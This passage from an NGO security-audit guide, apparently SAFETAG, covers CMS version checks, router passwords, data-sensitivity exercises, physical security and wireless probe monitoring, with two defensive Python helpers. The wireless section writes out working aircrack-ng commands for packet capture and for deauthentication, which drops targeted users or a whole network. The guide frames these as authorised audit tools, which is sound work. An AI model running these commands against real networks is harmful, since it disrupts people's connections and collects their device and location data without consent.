If an organization updates their website via FTP, it is worth noting that FTP is similarly insecure. Many hosting providers provide SFTP or FTPS, (two different, but secure, FTP versions), or secure WebDAV to upload files. These should be used, turning “plain” FTP off altogether if possible.

When switching to SSL/Secure FTP after having used the plain versions, webmasters should also update all administrative passwords, and watch to make sure that no step along the way (hosting provider management/panel, file upload, CMS editing) goes over “clear” channels.

Check for common website vulnerabilities

Summary

Content management systems require ongoing maintenance and updates to stay secure. Quite often these (or specific plugins) fall out of date and become increasingly vulnerable to automated as well as targeted attacks.

Overview
Materials Needed
Considerations
Walkthrough

Before unleashing more advanced and powerful tools like OpenVAS, a few quick steps can help better guide your work. As a general note, surfing using a browser with at least NoScript enabled may help not only protect you, but may also help to reveal malware or adware infecting the websites.

Record core details about the website - determine the hosting provider, platform, Content Management Systems, and other baseline data. BuiltWith is a great tool. There are a few alternatives, including an open source tool, SiteLab. Note that BuiltWith is a tool bundled in recon-ng, but the output it provides is not currently stored in its data structures. These tools may also reveal plugins, javascript libraries, and DDoS protection systems like CloudFlare.

Especially for CMS systems, out-of-date components mean well-known vulnerabilities that are easy for malicious actors to exploit. The publicly accessible CHANGELOG file at http://www.sampleorg.org/CHANGELOG.txt reveals an out-of-date and security-compromised (https://drupal.org/SA-CORE-2012-004) version of Drupal. Upgrade immediately.

Drupal 6.27, 2012-12-19
----------------------
- Fixed security issues (multiple vulnerabilities), see SA-CORE-2012-004.
Drupal 6.26, 2012-05-02
----------------------
- Fixed a small number of bugs.
- Made code documentation improvements.

For Drupal, try visiting /CHANGELOG.txt , which, if not manually removed, will reveal the most recent version of Drupal installed on the server. Other telltale signs depend on the specific Drupal release; http://corporate.adulmec.ro/blog/2010/drupal-detection-test-site-running-drupal maintains a detection tool.

For Joomla, default templates provide strong hints towards versions based on copyright dates. Specific versions can often be discovered using this guide: https://www.gavick.com/magazine/how-to-check-the-version-of-joomla.html

Wordpress sites tend to advertise their version number in the header of each webpage, such as

<meta name="generator" content="WordPress 3.3.1" />

There is a web-based tool with browser add-ons available here: http://www.whitefirdesign.com/tools/wordpress-version-check.html

For other CMS systems, try BuiltWith (http://builtwith.com)

Recommendation

Most popular CMS platforms provide emailed alerts and semi-automated ways to update their software. Make sure someone responsible for the website is either receiving these emails or checking regularly for available updates. Security updates should be applied immediately. It is a best practice, however, to have a “test” site where you can first deploy any CMS update before attempting it on a production site.

For custom CMS systems, it is strongly advisable to migrate to a more standard, open source system.

An increasingly good practice is for organizations to take advantage of the "free" tiers of DDoS mitigation services, of which CloudFlare is probably the best known. A challenge of these free services can be that they have definite limits to their protection. With CloudFlare, organizations can request to be a part of their Project Galileo program to support at-risk sites even beyond their normal scope of support.

A community-based, open source alternative is Deflect, which is completely free for eligible sites.

Some of these services will be revealed by BuiltWith, but the HTTP response headers (in Chromium/Chrome, available under the Inspect Element tool, or by using Firebug in Firefox) will also reveal them. See Deflect's wiki for more information.
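
The version-exposure checks described in the walkthrough above (the generator meta tag, the Drupal CHANGELOG.txt, and the response headers that reveal a DDoS-mitigation front end) can be automated so that an organization can re-run them against its own site after every update. The following is an added example written for this guide, not SAFETAG's own tooling and not BuiltWith; it works on constructed sample inputs (the HTML fragment, the changelog excerpt and the header set are made up, and the CF-RAY value is a placeholder), so it runs offline. The header check only knows Cloudflare's CF-RAY/Server signature, and `is_older` compares a discovered version against whatever version the operator knows to be current; no particular version is assumed to be current.

```python
import re
from html.parser import HTMLParser

# Constructed sample inputs (not from any real site).
SAMPLE_HTML = """<html><head>
<meta charset="utf-8">
<meta name="generator" content="WordPress 3.3.1" />
<title>Sample Org</title>
</head><body><p>hello</p></body></html>"""

SAMPLE_CHANGELOG = """Drupal 6.27, 2012-12-19
----------------------
- Fixed security issues (multiple vulnerabilities), see SA-CORE-2012-004.
Drupal 6.26, 2012-05-02
----------------------
- Fixed a small number of bugs.
"""

# Constructed response headers; the CF-RAY value is a placeholder, not a real ray id.
SAMPLE_HEADERS = {
    "Server": "cloudflare",
    "CF-RAY": "PLACEHOLDER-RAY-ID",
    "X-Powered-By": "PHP/5.3.3",
}


class _GeneratorMeta(HTMLParser):
    """Collects the content attribute of every <meta name="generator"> tag."""

    def __init__(self):
        super().__init__()
        self.generators = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("name", "").lower() == "generator":
            self.generators.append(a.get("content", ""))


def generator_version(html):
    """Return (product, version) from the first generator meta tag, or None if absent."""
    parser = _GeneratorMeta()
    parser.feed(html)
    for content in parser.generators:
        m = re.match(r"\s*(\S+)\s+v?(\d+(?:\.\d+)*)", content)
        if m:
            return m.group(1), m.group(2)
    return None


def drupal_changelog_version(text):
    """Return (version, release date) from the top entry of a Drupal CHANGELOG.txt, or None."""
    for line in text.splitlines():
        m = re.match(r"Drupal\s+(\d+(?:\.\d+)+),\s*(\d{4}-\d{2}-\d{2})", line)
        if m:
            return m.group(1), m.group(2)
    return None


def version_tuple(version):
    """'6.27' -> (6, 27) so that versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def is_older(found, current):
    """True when the discovered version is older than the one the operator knows to be current."""
    return version_tuple(found) < version_tuple(current)


def inspect_headers(headers):
    """Spot a Cloudflare front end and any header that discloses a software version."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = {"mitigation": None, "version_disclosure": []}
    # Cloudflare adds a CF-RAY header and reports "cloudflare" as the Server value.
    if "cf-ray" in h or "cloudflare" in h.get("server", "").lower():
        findings["mitigation"] = "Cloudflare"
    for name in ("server", "x-powered-by", "x-generator"):
        if name in h and re.search(r"\d+\.\d+", h[name]):
            findings["version_disclosure"].append(name)
    return findings


def assess(html, changelog, headers):
    """Combine the three checks into one dict that can go straight into audit notes."""
    return {
        "generator": generator_version(html),
        "changelog": drupal_changelog_version(changelog),
        "headers": inspect_headers(headers),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_HTML, SAMPLE_CHANGELOG, SAMPLE_HEADERS))
```

In practice the HTML, CHANGELOG.txt and headers would be fetched from the organization's own site with permission; the point of the offline functions is that every finding (a version string in a meta tag, a changelog left in the web root, a version in X-Powered-By) is something the organization can remove or update itself.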

Guide for NGOs about DDoS: Digital First Aid Kit

Explore Vulnerability Databases

Vulnerability Research

Summary
Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Examine Service Configuration Files

Activity Title

Summary

Examine configuration files for vulnerabilities using "hardening", or "common mistake" guides found online.

Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Network Vulnerabilities

See the Network Access and Mapping activities for methods to expose insecure wireless networks and for methods to use network mapping and traffic analysis to discover further potential vulnerabilities or points to investigate.

Penetrating Wireless Routers

Router Based Attacks

Summary

Many wireless routers still use the default password listed in “Router Default Password Search”, meaning that anyone with access to the network could also take complete control of the router - adding in remote access tools or setting up other attacks.

Overview
Materials Needed
Considerations
Walkthrough
Material that may be Useful:
Recommendation

Change Default Router Passwords

Passwords - particularly on core network devices - are very important. Use a password manager to save the new password (or be prepared to reset the router to a factory default).

While nominally "inside the firewall" and protected from remote attacks, leaving routers with default passwords, particularly wireless routers whose networks are often shared with visitors, is a potentially very high risk for an organization. Anyone who has gained access to the network via legitimate or other means could subtly alter the router's configuration to provide remote access, or route traffic to an attacker-designated server. Such changes can easily go undetected for long periods of time.

A common fear is forgetting the new router password. A password management system is an obvious solution, but if the router is in a secure location, even a sticky note would be better than the default password.

Data Assessment

Summary

This component allows the auditor to identify what sensitive data exists for the organization, where it is stored, and how it is transferred.

Purpose

Sensitive files are often stored across multiple devices with different levels of security. A data assessment allows the auditor to recommend secure storage solutions which best meet the organization's risk assessment and workflow needs. While the auditor has insight on some of this based on the Network Access and Network Mapping work, cross-staff understanding and agreement on what constitutes sensitive data will support later organizational change.

An adversary who obtains a laptop, workstation, or backup drive will be able to read or modify sensitive information on the device, even if that staff member has set a strong account password. This applies to threats involving loss, theft, and confiscation, but also to "checkpoint" scenarios in which they may only have access for a few minutes. Furthermore, in the event of a burglary or office raid, an adversary could obtain all sensitive information on the organization's devices, possibly even undetected.

The Flow Of Information

Data Assessment Information Flow

Guiding Questions

Approaches

If it was not possible to conduct these activities in person, you can conduct them remotely through applying one of the remote facilitation approaches described in the Remote Facilitation appendix.

Outputs

Operational Security

Preparation

Resources

Activities

Sensitive Data

Summary

Data and meta-data about an organization and its staff are incredibly difficult to keep track of over time, as people or projects use cloud services like Dropbox or Google Drive for some activities, a shared server for others, and a mix of work and personal devices (laptops, phones, tablets...).

This is natural, but it is important to keep track of where your organization's data lives and who can access it.

Overview
Materials Needed
Considerations
Walkthrough

Sensitive Data Assessment Activity

Duration: 45 minutes

This exercise is adapted from the LevelUp Activity, Backup Matrix, part of the curricula for Data Retention and Backup by Daniel O'Clunaigh, Ali Ravi, Samir Nassar, and Carol.

Materials to Prepare:

Relative Sensitivity | Computer | USB / External Drive | Cloud Storage | Phones, Print, etc.
High                 |          |                      |               |
Moderate             |          |                      |               |
Low                  |          |                      |               |

Explain to participants that we're going to conduct an information mapping activity to get a sense of where our important information actually is.

Start by listing the different places where our information is stored, according to participants. If no suggestions are forthcoming, we can prompt participants with the obvious stuff:

Use large stickies to place these as column headers on a wall. More will come up later in the course of the exercise.

Elicit from participants what type of information or data they have in each of these places. For example:

To encourage participant interaction, write one example on a sticky and place it in the appropriate box in the matrix. Then, ask whether there is another copy of this data somewhere. If there is, you can use another sticky and put it wherever they keep the duplicate.

TIP: Place Computers, Phones, and Email next to each other, so you won't have to create duplicates for everything "stored" in email (and therefore on laptops and phones)

Introduce a new vertical axis representing sensitivity. The higher on the chart, the more sensitive the data. Ask the participants to rank data.

For a large group, divide the group into smaller teams for the next steps (it helps if there are relatively clear thematic distinctions within the group, such as nationality, type of work, area of interest, etc.)

Provide stickies to the group(s). Have the group(s) brainstorm about all of the data they work with, focusing on the most important data first.

Participants should write ONE type per sticky, and create duplicates if the data is stored in multiple locations.

For a small group, this can be done as a "live" brainstorm. For larger groups that have been subdivided, have each group finish listing out their most important data and then have each group place the stickies on the matrix. Invite discussions around the sensitivity of the data.

An example may look something like this:

Level Up Backup Matrix Example

Explain that this gives us an idea of where our data is. Ask whether this is all the data we generate. Of course it isn't: it's only a small percentage.

The LevelUp lesson uses this primarily to discuss the importance of backups, and this is a valuable point to make.

Call out the information that they are keeping on their computer's hard drive (which will usually be the fullest one). Elicit some of the things that can cause a computer to stop working. Maybe take a show of hands: Who has had this happen to them?

For SAFETAG, we focus on the "Sensitive data in the wrong hands" section. Based on the clustering of sensitive data along the vertical axis, choose a column that has an unusual amount of sensitive data (email or computers, usually).

Remove the stickies from the column but keep them in your hand and read them. Now I have this information. What can I do with it? And what are you left with? Is anyone at risk - yourselves? partners? If this were published on the Internet, what would happen?

Recommendation

Risks of Data Lost and Found

Summary

Have staff rank the impact if different data within the organization was lost, and the impact if various adversaries gained access to that data.

Overview
Materials Needed
Considerations
Walkthrough

See the Sensitive Data activity for an interactive way to gather the types of data in the organization for this ranking exercise.

Recommendation

Private Data

Summary

Guide staff through an activity to have them list private data within the organization (e.g. using the "Personal Information To Keep Private" handout).

Overview
Materials Needed
Considerations
Walkthrough

Personal Information To Keep Private

Information that can be used to identify individuals, organizations, and even communities of practice should be treated with the utmost care. Some data, like names, phone numbers, and addresses, are obvious, while others, like computer names, the MAC addresses of wifi cards, or pseudonymous social media accounts, may be less obvious. Also, combinations of information - location, date, and type of activity, or even an issue area of interest and a city name - may specify a very small number of activists or organizations.

This spreadsheet, part of the Responsible Data Forum documentation sprint, provides a useful baseline of types of data and ways to manage or obfuscate it usefully: Data Anonymization Checklist

Recommendation

For the internal audit report back to the organization, much of the information will require specific identification of user devices (and by extension, their users), as well as very sensitive organizational data. None of this data, by intention, accident, or adversarial action, should be shared with third parties.

Please refer to the Analysis and Reporting section for the limited data set that is required for project reporting, and to the Operational Security section for guidance on data security.

Physical and Operational Security

Summary

The organizational security methodology is focused on how to mitigate against threats that occur because of the arrangement of digital assets in the physical world -- how secure are the devices at an organization's office, where and how staff travel with organizational devices, and whether staff work outside of the office (e.g. in remote offices, at their homes, while traveling, or at cafes). Further, is organizational information accessed from personal devices, and how are those devices secured?

Purpose

While the SAFETAG framework is focused on the security of data, the physicality of devices, backup drives, servers, and even hard-wired networks cannot be overlooked.

For many organizations, digital threats that depend on physical access are considered the least probable. So much so, that many security specialists concede that there is no proper defense against an attacker with physical access to sensitive hardware. While there is some truth to this, it is not useful advice for small scale civil society organizations or independent media houses. The risks that advocacy and media organizations face are far more varied, and the cost of lost information can be crippling to their ability to operate. As such, these risks have high severity, despite their equally high probability for these organizations.

Depending on the specific threats for each organization, the auditor should consider the challenges not only of one-time exfiltration of data, but also of potential ways an adversary could use physical access or proximity to the organization or its devices to gain ongoing remote access, track the organization, or cause harm through the outright destruction of data.

The Flow Of Information

Data Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Activities

Guided Tour

Summary

During this component an auditor tours the audit location(s) and flags potential risks related to physical access at that location.

Overview

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

This can be done remotely via secure videoconference over a smartphone or tablet that can be moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Materials Needed
Considerations
Walkthrough

As part of your first day, have your point of contact walk you around the office - this is primarily a chance to understand the office layout and meet the rest of the staff, but take mental note of the devices in use and lying out on desks as you walk around the office. Note as well the location of and access to components such as servers and networking components. Taking actual notes may make the staff feel that you are judging them, especially if this is your first interaction -- refrain from this, and if needed, also consider a more "neutral" note-taking process by integrating the Office Mapping activity.

If the auditor is unable to go to the office (or can only visit one of multiple offices), consider having the point of contact use a video call. You will want to have the entire staff be aware of this activity and know the person who is walking around the office. This requires sufficient (and unmetered or low-cost) bandwidth for a 1-hour video call. This could be scheduled for before or after office hours to both discover how devices are left overnight as well as reducing the impact on the network.

Similarly, the in-person tour can also be done outside of normal business hours. Please note: this can damage the trust the staff has in the auditor, as well as unintentionally embarrassing specific staff members in the eyes of the point of contact. It is not recommended to do this except for organizations who have already received training and worked on improving their physical/operational security practices and face an active adversary. This could be before the staff arrives in the morning, during lunch, or after hours (perhaps have dinner with your point of contact, and come back to check the organization afterwards). This gives a clearer picture of how devices are secured outside of the work day (are desktops and laptops unsecured, still on, logged in?). Are backup drives or other storage media easily accessible? Are doors to server rooms/closets locked? Are keys to these locked cabinets/rooms visible?

Recommendation

Office Equipment is unsecured against burglary

Unsecured physical network components and devices such as computers, servers, and external drives present a risk of sensitive data loss through theft, seizure, and malicious interference. Access to network components and servers should be limited and devices should be secured when not in use.

In the event of a burglary or office raid, an attacker could easily obtain sensitive information from devices without encryption, external hard drives, and other easily accessible items. An advanced attacker could compromise the network for later surveillance.

Secure Devices

Lock in desks or via security cables all easily portable items

Any device which connects to the organization's digital assets (and therefore has passwords or cached data) or stores organizational data (including backup drives, laptops, desktops, cameras, other storage media), should be secured (ideally out of sight, such as in a locked cabinet or desk drawer) when not in use to prevent theft and discourage seizure.

Follow the Device Assessment guidelines on drive encryption.

Encrypted drives offer the best protection against data loss from stolen or seized devices. Follow the recommendations of the Device Assessment section, paying specific attention to the need for strong passwords, automatic locking of logged-in accounts, and the importance of turning a machine off to fully benefit from drive encryption.

Place core network components and servers in a locked space.

Direct access to servers and network components such as routers, cablemodems, patch panels and switches provides an adversary multiple ways to extract sensitive information and cause extensive, yet hard to detect, damage. Ensuring that not only are these physically protected, but that there are organizational policies around which staff have access to them is critical - a locked cabinet that always has the key in the lock does not provide security. If a particular component needs, for example, regular rebooting, creative solutions should be found to balance security and staff needs.

De-activate unused network ports

Hard-wired network ports tend to connect directly into the most trusted parts of a network. De-activating any that are in public areas of the office (front desk, conference rooms, break rooms), as well as any that are not needed is recommended.

Operational Security Survey

Summary

This activity helps the auditor assess the organization's current operational security policies and practices through in-person or remote surveys and/or interviews. By also requesting to review any official policies, as well as conducting multiple iterations of this with different staff members, some basic verification of the practices and of awareness/understanding of existing policies can be achieved.

Overview

The auditor interviews and/or requests survey input from organizational representatives, requests supporting documentation (e.g. policies) as relevant, and iterates/repeats as needed.

This activity is used to solidify the auditor's understanding of the physical risks the organization faces in its work as they impact information security:

This can be done entirely remotely over secure communications channels (see operational security considerations), and may be useful to be done partially or fully in advance of an in-person audit to further understand operational risks of traveling to the office location.

Materials Needed
Considerations
Walkthrough

This activity should build on the preparation work of the auditor, as well as the capacity assessment and context research work:

Once an initial interview or survey has taken place (as part of capacity assessment or dedicated to the above-mentioned questions), send a follow-up request for any policies mentioned or referred to (travel policies, onboarding/offboarding policies for staff changes, personal device usage ("BYOD") policies, etc.). After reviewing those documents, request any additional policies those may refer to (general IT or security policies), and/or schedule a follow-up interview or informal survey to dig deeper into remaining unanswered questions on the operational security situation of the organization as well as their adaptations to it. In the (likely) case where there are no policies governing these topics, the auditor can ask their points of contact for these discussions what the general practices are and expand and verify this through additional activities.

In creating new questions, be careful not to "lead" on security in a way that would discourage honest and transparent responses. For example, ask "Do you host community events and trainings?" instead of "Do you allow outside people into your office?"

Below are questions not already covered in the capacity assessment interview process, and after that selected questions from that process which are of particular use here.

Office layout and access

Has the organization dealt with robberies/theft, break-ins, or office raids? If so, what happened, when, and how did you respond (or do you have a policy or contingency plan? When was that last reviewed/updated?)

Who has independent access to the office space, and routine after-hours access (i.e. who is able to unlock the space)? This may include security, cleaning or other building service personnel.

Programs and staff

Selected questions from the Capacity Assessment Interview, "Open Up" section:

From "Threat Information"

From the Technical Only section:

Recommendation

See recommendation section in the Guided Tour activity.

For useful organizational policy recommendations, review the SANS Information Security Policy Templates

Office Mapping

Summary

This activity seeks to identify potential physical vulnerabilities to an organization's information security practices by documenting the current physical layout of the office and the locations of key assets, as well as potential "external" risks such as nearby/shared office spaces.

This can be done in person independently or alongside the "Guided Tour" activity, and can also be done in advance of an assessment or remotely by a willing staff member who knows where these assets are located (often a technical or administrative staff person). This can also be conducted in a multi-office or home-office environment where the auditor is unable to visit every location.

Overview

In this activity, the auditor or the organization draws a map of the office space and notes locations of potentially valuable information or assets.

This activity can be paired with the Guided Tour activity, to reduce the awkwardness of taking notes while walking around the office during the Tour, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each. This can also be done by an organizational point of contact in advance to provide additional preparation for the auditor.

Materials Needed
Considerations
Walkthrough

Walk around the office and draw a map of the floor-plan (do not rely upon memory). Consider taking photos of specific areas (e.g. confusing layouts or areas difficult to capture in drawing). Make notes of where intruders could gain access to the office, where sensitive data may live (in the executive director's desk, in a storage closet, on devices), and relevant other items. Also note the overall privacy that the office provides (is it a shared office space, shared building, etc.)

Note the locations of any of the following that apply:

If doing this activity remotely and/or in advance of an audit, it may be useful to have multiple staff members independently draw maps and to provide the organization with additional guiding questions:

Recommendation

See recommendation section in the Guided Tour activity.

Scavenger Hunt

Summary

This activity assists in identifying potential physical security concerns at an organization, particularly when an auditor cannot travel to the office location or cannot visit every office location. The scavenger hunt approach is focused on involving the organization's staff members in mapping out potential threats, based on the abstraction and gamification of the physical security mapping process. See the "Risk Hunting" exercise in SaferJourno, page 19, for additional ideas and guidance on conducting this activity.

Overview

A local facilitator is required to lead this "scavenger hunt" where staff members seek out potential physical security challenges themselves. This activity should only be conducted within an environment with a high level of trust and consent. The auditor should get the agreement of the host NGO to involve all staff members in the exercise to avoid causing trust issues. By involving the staff members in identifying physical security risks, you are also taking a step forward to increase awareness of these issues.

With facilitation, staff members will explore their own office looking for potential physical security risks and share results. To reduce the risk of individual staff embarrassment, they will first review their own working space and secure it before looking around other parts of the office. The facilitator, in consultation with the auditor and the organizational point of contact, may declare some areas "off limits".

Materials Needed
Considerations
Walkthrough

The auditor should first meet with the facilitator (possibly over secure videochat) to brief them on the activity and map out potential challenges (particularly around trust, organizational hierarchies, and any potential repercussions).

The auditor then prepares a checklist of physical vulnerabilities with the facilitator, based on the current understanding of the organization's assets and the context they are operating within. The auditor, facilitator, and organization point of contact should decide if any areas are "off limits." Note that this is only a list of suggestions. As with the "Risk Hunting" exercise in SaferJourno, it should be modified to fit the requirements, assets, and threats the organization faces:

At the organization, the facilitator explains the activity to the organization members. To balance the need for consent with the benefits of identifying actual daily practices which may need improvement, the staff should already be aware that examining physical devices is part of the audit scope, but not the specific activity. Staff will be able to first identify and address their personal concerns before others.

Recommendation

(See "Guided Tour")

Monitor Open Wireless Traffic

Summary

It can be valuable to listen to broadcast wireless traffic at the physical office location, even before knowing anything about the organization's network itself. This outside, passive information gathering can reveal a surprising amount of data on not only what devices are connecting to which networks, but also what type of devices they are (based on their unique MAC addresses), and what other networks those devices have historically connected to. These probes can reveal personal, organizational, locational, and device information that, taken in context, can be dangerous or lead to other vulnerabilities.

Overview

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

Materials Needed
Considerations
Walkthrough
Step 1: Monitor Mode

You should disconnect from any wifi network you may be connected to, in order to capture the widest amount of data.

Switch your wireless adapter to monitor mode

$ airmon-ng start <interface>

You may need to stop your network manager system to prevent it from interfering. Running

$ airmon-ng check

to list anything that is causing problems, and

$ airmon-ng check kill

to try and stop them automatically, and running stop network-manager && stop avahi-daemon may keep them from re-starting automatically.

Step 2: Listen for wifi probes.

Run airodump-ng on the monitor mode interface (usually mon0). This listens to wifi beacons and you can begin analyzing who is on what network, and see historical networks.

airodump-ng -w filename mon0

This scans all networks and channels, collecting broadcast network information. Note that, despite its broadcast nature, this is privacy invasive and can be considered illegal: http://www.slate.com/blogs/future_tense/2013/09/16/google_street_view_wi_fi_snooping_case_good_news_and_bad_news.html . You can restrict this to a specific channel or base station ID (BSSID) with -c and --bssid:

airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w filename mon0

Step 3: de-auth (optional)

Send de-authentication packets to force clients to reconnect and send out additional probes. Take note that by its very nature, de-authentication causes annoying interruptions to wifi traffic. This breaks connections, drops Skype calls, and can make the wireless network temporarily unusable -- make sure to check with staff before going through this (to make sure no one is doing a live webcast or on an important VOIP call, and so they expect some network instability).

$ aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

 15:54:48  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
 15:54:49  Sending 64 directed DeAuth. STMAC: [AA:BB:CC:DD:EE:FF] [ 5| 3 ACKs]

This command de-authenticates one targeted user with one attempted deauth packet. "-0 10" would try 10 times (potentially disconnecting the user multiple times!). With permission, you can also target all users on a network by leaving out the "-c ..." flag.

There are scripts, like wifijammer, which use this same approach to jam all wifi connections in range of the attacking computer, so check against the documentation at http://www.aircrack-ng.org and act responsibly to protect yourself and the organization.

Step 4: MAC Address Research

The first three hex numbers of each MAC address designate the vendor, which can reveal useful information in matching MAC addresses to devices. The MAC address is a unique identifier, so never post or search using the full address. Note that increasingly, devices are using MAC address randomization, but where it is implemented, it is often implemented poorly against even minimally determined adversaries, as per this 2017 research study.

To compare found MAC addresses to the vendor database offline, you can download the full vendor database from IEEE or use the Wireshark list.

Step 5: Ongoing Monitoring

The longer you leave this running (particularly when staff are first entering the office or returning after lunch/meetings), the better sense of what devices are connected to the network you will get.

Watch what probes the various devices are sending out (especially when they are deauthenticated, as above). You will see each computer on the network, as identified by its MAC address, broadcast information about previous networks to which it has connected.

BSSID              STATION            PWR   Rate    Lost    Frames Probe

00:11:22:33:44:55   0F:3E:DF:DA:2D:E2   -67 0   0   234567  SampleOrg,linksys,John Smith's iPhone,Free Public Wifi
00:11:22:33:44:55   F8:7E:FC:03:CC:43   -80 -24 0   234567  amygreen,SampleOrg,android-hotspot,Starbucks,united_club,Dulles Airport WiFi
00:11:22:33:44:55   F8:19:F3:DF:75:19   -58 -54 0   234567  SampleOrg
00:11:22:33:44:55   38:08:95:EB:7E:0B   -75 -12 0   234567  HolidayInn,SampleOrg,John Smith's Mac mini,android-hotspot
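The following is an added audit helper, not SAFETAG's own code, that serves both Step 4 (MAC address research) and the probe monitoring above: it looks up station MACs offline against a Wireshark-style manuf table with longest-prefix matching, flags locally administered (randomized) addresses that carry no vendor OUI, and lists each device's probed SSIDs beyond the organization's own. The manuf excerpt, the station rows and the ORG_SSIDS set are constructed sample data; the vendor names are invented.

```python
"""Added audit helper (not SAFETAG's code): parse airodump-ng station rows,
look up vendors offline, flag randomized MACs and list leaked probe SSIDs."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed excerpt in the tab-separated Wireshark "manuf" layout
# (prefix, short name, long name). The vendor assignments are made up;
# use the real Wireshark/IEEE file when auditing.
MANUF_SAMPLE = """\
# comment lines are ignored
F8:7E:FC\tExampleNet\tExampleNet Devices Ltd
F8:19:F3\tAcmePhone\tAcme Phone Corp
38:08:95\tAcmePhone\tAcme Phone Corp
38:08:95:E0:00:00/28\tAcmeAudio\tAcme Audio (MA-M block)
"""

# Constructed station rows in the layout shown on this page. Rate is a single
# token here; live airodump-ng prints it as e.g. "0 - 1", so widen the split
# before feeding a real capture.
STATION_SAMPLE = """\
BSSID              STATION            PWR   Rate    Lost    Frames Probe

00:11:22:33:44:55   0F:3E:DF:DA:2D:E2   -67 0   0   234567  SampleOrg,linksys,John Smith's iPhone,Free Public Wifi
00:11:22:33:44:55   F8:7E:FC:03:CC:43   -80 -24 0   234567  amygreen,SampleOrg,android-hotspot,Starbucks,united_club,Dulles Airport WiFi
00:11:22:33:44:55   F8:19:F3:DF:75:19   -58 -54 0   234567  SampleOrg
00:11:22:33:44:55   38:08:95:EB:7E:0B   -75 -12 0   234567  HolidayInn,SampleOrg,John Smith's Mac mini,android-hotspot
"""

ORG_SSIDS = {"SampleOrg"}  # the organization's own network names (assumed)

def mac_to_int(mac: str) -> int:
    return int(mac.replace(":", "").replace("-", ""), 16)

def is_locally_administered(mac: str) -> bool:
    """Bit 1 of the first octet set = locally administered, which is what MAC
    randomization produces; such an address carries no vendor OUI."""
    return bool(int(mac.split(":")[0], 16) & 0x02)

def load_manuf(text: str) -> Dict[Tuple[int, int], str]:
    """(prefix_bits, prefix_value) -> vendor; handles 24-bit OUIs and longer
    MA-M/MA-S entries written as XX:XX:XX:XX:XX:XX/bits."""
    table: Dict[Tuple[int, int], str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        addr, _, bits = fields[0].partition("/")
        octets = addr.count(":") + 1
        nbits = int(bits) if bits else 8 * octets
        padded = mac_to_int(addr) << (48 - 8 * octets)  # left-align to 48 bits
        table[(nbits, padded >> (48 - nbits))] = fields[-1]
    return table

def vendor_for(mac: str, table: Dict[Tuple[int, int], str]) -> Optional[str]:
    """Longest-prefix match, so an MA-M block wins over its parent OUI."""
    value = mac_to_int(mac)
    for bits in sorted({b for b, _ in table}, reverse=True):
        hit = table.get((bits, value >> (48 - bits)))
        if hit:
            return hit
    return None

@dataclass
class Station:
    mac: str
    probes: List[str]

def parse_station_rows(text: str) -> List[Station]:
    stations = []
    for line in text.splitlines():
        parts = line.split(None, 6)  # Probe is the 7th field and may contain spaces
        if len(parts) < 6 or parts[0] == "BSSID":
            continue
        probes = parts[6].split(",") if len(parts) == 7 else []
        stations.append(Station(parts[1], [p.strip() for p in probes if p.strip()]))
    return stations

def leaked_probes(stations: List[Station], org_ssids: set) -> Dict[str, List[str]]:
    """Per station MAC, the probed SSIDs that are not the organization's own:
    each is a network name the device announces wherever it goes."""
    leaks = {}
    for s in stations:
        foreign = [p for p in s.probes if p not in org_ssids]
        if foreign:
            leaks[s.mac] = foreign
    return leaks

def audit(station_text: str, manuf_text: str, org_ssids: set) -> List[dict]:
    table = load_manuf(manuf_text)
    stations = parse_station_rows(station_text)
    leaks = leaked_probes(stations, org_ssids)
    return [{"mac": s.mac, "vendor": vendor_for(s.mac, table),
             "randomized": is_locally_administered(s.mac),
             "leaked_ssids": leaks.get(s.mac, [])} for s in stations]

if __name__ == "__main__":
    for row in audit(STATION_SAMPLE, MANUF_SAMPLE, ORG_SSIDS):
        print(row)
```

Devices whose leaked_ssids list is non-empty are the ones the "Cleanse wifi network connection history" recommendation below applies to; a randomized address with no vendor match still identifies a device by its probe list.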

Recommendation
Recommendation: Cleanse wifi network connection history

For most devices, deleting networks from the “saved” network list will stop them from being probed. Obviously, this can be an annoyance for networks you regularly connect to, so renaming these networks to non-revealing names would help, as would creating non-name-associated “guest” networks for colleagues connecting to your home network.

On iPhones and iPads, it is not possible to selectively remove historical networks unless you are currently in range of that network. It is however possible to remove all history: go to Settings > General > Reset > Reset Network Settings. When you take this step, it is worth going through this reset multiple times – approximately once per year of device ownership – as the first reset appears to only remove recently-connected networks, and older networks will still be broadcast.

Recommendation: Use innocuous network names

Organizations may want to choose innocent or generic network names, and/or not broadcast network names. It is worth noting that devices seeking out hidden networks will "beacon" for the actual network name, so this has extremely limited security use and must be combined with other protective measures. See this Acrylic blog post for further details.

